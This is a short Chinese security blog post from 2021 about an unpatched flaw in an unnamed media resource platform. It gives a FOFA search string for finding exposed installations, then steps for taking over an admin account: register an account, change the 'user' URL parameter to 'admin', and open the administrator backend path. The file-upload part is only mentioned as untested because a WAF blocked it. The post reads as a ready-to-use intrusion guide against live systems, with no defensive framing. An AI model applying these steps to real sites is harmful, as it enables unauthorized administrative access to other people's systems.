spaceman'blog > 某媒体资源平台 权限绕过+文件上传 by 月球大师傅

某媒体资源平台 权限绕过+文件上传 by 月球大师傅

2021-03-27

权限, 文件上传

某媒体资源平台 权限绕过+文件上传 by 月球大师傅

漏洞简介

月球师傅发的某媒体资源平台 0day

资产收集

FOFA:

1
"/Widget/common/Service/CommonWidgetService.asmx/Categorylist"

漏洞复现

注册一个用户: http://xxx.xxx.xxx/Module/SSO/SJS_Register.aspx

image-20210327163255359

登录账号,访问:/Module/PersonalCenter/Default.aspx?user=566

image-20210327163423467

垂直权限绕过:/Module/PersonalCenter/Default.aspx?user=admin

image-20210327163928722

跳转至管理员后台界面: /SmartMobile/MobileIndex.aspx?uname=admin&orgId=0

image-20210327163951377

文件上传我没有测试成功,有个啥云waf,感兴趣的师傅可以去F12sec看看:http://www.0dayhack.net/index.php/1278/